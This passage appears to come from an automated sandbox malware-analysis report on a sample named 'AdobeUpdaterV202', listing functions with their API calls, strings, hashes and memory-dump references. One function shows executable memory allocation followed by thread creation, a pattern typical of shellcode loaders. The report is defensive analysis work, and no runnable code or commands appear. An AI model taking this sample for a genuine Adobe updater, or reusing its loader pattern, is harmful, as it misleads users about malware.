Opcode Fuzzy Hash: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
Instruction Fuzzy Hash: 7971B3729002096BDF219A649C82FAF77E9DF8F318F252059E815BF292D735AD01C764

Function 00E9429A Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E942E3
__alloca_probe_16.LIBCMT ref: 00E9430F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E9434E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E9436B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E943AA
__alloca_probe_16.LIBCMT ref: 00E943C7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E94409
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E9442C

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
Instruction ID: ee326f976f351e4463ddcd7406c4873eee018c4cfeaecfdfee75d0f232b7be38
Opcode Fuzzy Hash: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
Instruction Fuzzy Hash: 9F518DB250020AAFEF209F64CC85FAF7BBAEF44759F155125FD15B6190D7309C128BA0

Function 00E97680 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E976B7
___except_validate_context_record.LIBVCRUNTIME ref: 00E976BF
_ValidateLocalCookies.LIBCMT ref: 00E97748
__IsNonwritableInCurrentImage.LIBCMT ref: 00E97773
_ValidateLocalCookies.LIBCMT ref: 00E977C8

Strings

csm, xrefs: 00E9775D

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
Instruction ID: 0d5a44efc33d6a11f7265c2f08a3bb553b5d8445da63f80ce4513e1a864e8af3
Opcode Fuzzy Hash: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
Instruction Fuzzy Hash: 3641C334A142199FCF10DFA8CC85A9E7BF1BF46315F149096E854BB392D731AD09CB90

Function 00E9EFA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00E9F0B5,?,?,00000000,00000000), ref: 00E9F069

Strings

ext-ms-, xrefs: 00E9F013
api-ms-, xrefs: 00E9EFFF

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
Instruction ID: 531a082dae165969a8cf78a3014fc92928714ced363a10a022ebe910df38e6f1
Opcode Fuzzy Hash: cbc65622fcaf67d530017bbdc90f3c4536352f9595b53799dfab4738f3d4a284
Instruction Fuzzy Hash: F4212731A01210ABCF219B21AC84A9E375CAF123B8F241130EA16FB3D2EB70FD01C6D0

Function 00E920F3 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E920FA
std::_Lockit::_Lockit.LIBCPMT ref: 00E92104
int.LIBCPMT ref: 00E9211B

Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E

codecvt.LIBCPMT ref: 00E9213E
std::_Facet_Register.LIBCPMT ref: 00E92155
std::_Lockit::~_Lockit.LIBCPMT ref: 00E92175
Concurrency::cancel_current_task.LIBCPMT ref: 00E92182

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
Instruction ID: c7a1a1dd01ed935090d53fff52c4178ea93c6eb337942c61fe89ceb05fdc7196
Opcode Fuzzy Hash: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
Instruction Fuzzy Hash: EB01CC75901219ABCF05EBA4C816AAEB7A6BF84714F24550DF6107B292DFB09E06DB80

Function 00E92188 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E9218F
std::_Lockit::_Lockit.LIBCPMT ref: 00E92199
int.LIBCPMT ref: 00E921B0

Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E

ctype.LIBCPMT ref: 00E921D3
std::_Facet_Register.LIBCPMT ref: 00E921EA
std::_Lockit::~_Lockit.LIBCPMT ref: 00E9220A
Concurrency::cancel_current_task.LIBCPMT ref: 00E92217

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
Instruction ID: 91728cdd243ddeab66470ca811867104f4ec1010a30df09e26884fa2be5f5f50
Opcode Fuzzy Hash: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
Instruction Fuzzy Hash: 9E01DE7590011AABCF05EBA0C806ABEB7F5BF84714F24140DE5107B2E2DFB09E05DB91

Function 00E9787A Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E97871,00E95E40,00E94F12), ref: 00E97888
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97896
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E978AF
SetLastError.KERNEL32(00000000,00E97871,00E95E40,00E94F12), ref: 00E97901

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
Instruction ID: f6972bd55d8e0f02485ad70eff497f6d264fa5713332d5992deaa56a814f47d6
Opcode Fuzzy Hash: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
Instruction Fuzzy Hash: 1201F53232C2265EEEB82778AC8D59A3A94FF023B5730222EF420711E1EF514C19A194

Function 00EAC1F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B

Part of subcall function 00EAC151: _Deallocate.LIBCONCRT ref: 00EAC1EC

CreateThread.KERNEL32(00000000,00000000,00000188,00EB7030,00000000,00000000,?,?,00EAC2E6), ref: 00EAC23F
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252

Strings

ole, xrefs: 00EAC1FA

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
String ID: ole
API String ID: 440434604-1213916275
Opcode ID: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
Instruction ID: 1633923686453f40df89e3ac8e856e3ca609d198f55b319506146c2214cbcf21
Opcode Fuzzy Hash: 6463a8d50277f3c4b53054591b0db264c8906deacfc08482ce9ad8c93e83a081
Instruction Fuzzy Hash: 8EF0827620511C7FD15137639C89EBB3A6DDB8B7E5F520110FA06A55828A15380642B5

Function 00E9C13F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C174
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C186
FreeLibrary.KERNEL32(00000000,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C1A8

Strings

CorExitProcess, xrefs: 00E9C17E
mscoree.dll, xrefs: 00E9C16D

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
Instruction ID: bb6b09f96bef3c88e57e23191e3fb0e6d7a9d2adabeaad535894d1db3088787c
Opcode Fuzzy Hash: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
Instruction Fuzzy Hash: 0001D671A44759FFDB119F92DC49FAEBBB9FB49B14F000125F812B26E0DB74A804CA90

Function 00EA29E1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00EA2A68
__alloca_probe_16.LIBCMT ref: 00EA2B29
__freea.LIBCMT ref: 00EA2B90

Part of subcall function 00EA1DC1: HeapAlloc.KERNEL32(00000000,00E91FA6,?,?,00E957EA,?,?,?,00000000,?,00E917E2,00E91FA6,?,?,?,?), ref: 00EA1DF3

__freea.LIBCMT ref: 00EA2BA5
__freea.LIBCMT ref: 00EA2BB5

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
Instruction ID: f21556953c3f8fd1f0d1f7f7cf5021f05883ed1c0520c5149daa706a90068683
Opcode Fuzzy Hash: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
Instruction Fuzzy Hash: B251B172600216ABEF249E68CC81EBB3BE9EF4A714B15156CFE04FA250E731ED108760

Function 00E93BCF Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E93BD6
std::_Lockit::_Lockit.LIBCPMT ref: 00E93BE1
std::_Lockit::~_Lockit.LIBCPMT ref: 00E93C4F

Part of subcall function 00E93D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E93D4A

std::locale::_Setgloballocale.LIBCPMT ref: 00E93BFC
_Yarn.LIBCPMT ref: 00E93C12

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
Instruction ID: ad467c95ae187b574e469a0cba65983ef70841170de1555fa9eba367979a8733
Opcode Fuzzy Hash: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
Instruction Fuzzy Hash: A601BCB5A011159BCF0AEB30C85593CBBB5BF99740B141009E80277391CF74AF02DB85

Function 00EA0A0E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BA6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BB9

Strings

, xrefs: 00EA0AAF
, xrefs: 00EA0A8D

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: $
API String ID: 885266447-2088381004
Opcode ID: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
Instruction ID: 99016b8ebf2c8504ef4e6be0c4a090a0898f86758066c096f274c117c69e6c97
Opcode Fuzzy Hash: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
Instruction Fuzzy Hash: B7515071A00249AFCF14CF98C991EEEBBB2EB4E358F149159E955AB351D330AE41CB60

Function 00E92391 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E92398
std::_Lockit::_Lockit.LIBCPMT ref: 00E923A5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E923E2

Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93CEC
Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93D10

Strings

bad locale name, xrefs: 00E923F3

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
Instruction ID: 3be9b361b0d64d8e7ca3b2d819bf692db5bacc8592bf837a4f9b67e70ecaff5a
Opcode Fuzzy Hash: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
Instruction Fuzzy Hash: 3E0180715057849FCB309FAA948158AFEE0BF29350750996FE18DA7B02C770A600CBA9

Function 00E989C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000800,?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue), ref: 00E989CF
GetLastError.KERNEL32(?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989D9
LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000000,?,00EB4FF0,?,?,?,00E916D9,?,00E916D9,?), ref: 00E98A01

Strings

api-ms-, xrefs: 00E989E6

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
Instruction ID: 31fd68b75579fa293d3592454813e49ae0ad0d5cb65f2e3f8243dd5abbac5ceb
Opcode Fuzzy Hash: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
Instruction Fuzzy Hash: C5E04870244344BFEF105F62DE46B583E569F17B54F145021FA0DF84F1EBA1E8558584

Function 00E9FB8E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,00000000), ref: 00E9FBF1

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9FE4C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E9FE94
GetLastError.KERNEL32 ref: 00E9FF37

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
Instruction ID: 9c2bfa02b2f389c3bd55a233e39d1ff2d01f433db526e39ad25b82547affd2a1
Opcode Fuzzy Hash: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
Instruction Fuzzy Hash: 26D146B5E102489FCF15CFA8D880AEDBBB5FF09314F18856AE855FB251DB30A942CB50

Function 00E97991 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E97A58
___AdjustPointer.LIBCMT ref: 00E97A7B
___AdjustPointer.LIBCMT ref: 00E97B17

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
Instruction ID: 0c3b67a63ff3185d88dc2aeb0f5db1604c564f7db920e83457e4bd7c9e4437b6
Opcode Fuzzy Hash: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
Instruction Fuzzy Hash: 24511472618602AFDF298F55C841BBE77A1FF40314F18212DE88177291E7B0EE88C790

Function 00EA4010 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0

GetLastError.KERNEL32 ref: 00EA4074
__dosmaperr.LIBCMT ref: 00EA407B
GetLastError.KERNEL32(?,?,?,?), ref: 00EA40B5
__dosmaperr.LIBCMT ref: 00EA40BC

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
Instruction ID: 8dd3020a7f8f4995fd50c96739f1cd520e9f373256de9073a9dd46602ca9ca56
Opcode Fuzzy Hash: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
Instruction Fuzzy Hash: BC21D8B1600305AFCB20AF719DC186BB7EDEF8A3647009518FA25BB591D7B1FC509752

Function 00E9B369 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
Instruction ID: 1d5a5a7442404c01dcb086e8b468368d98cd509a68ecbbac4890636fd9e720fc
Opcode Fuzzy Hash: 2a436285c5a8482067bd8b11467ddaf33dc4d6d1a03e855b040c342a2b88276c
Instruction Fuzzy Hash: 21216231604205AF9F20EF61AE8197FB7EAEF453687109514F925B7152E770EC50A760

Function 00EA4FA6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

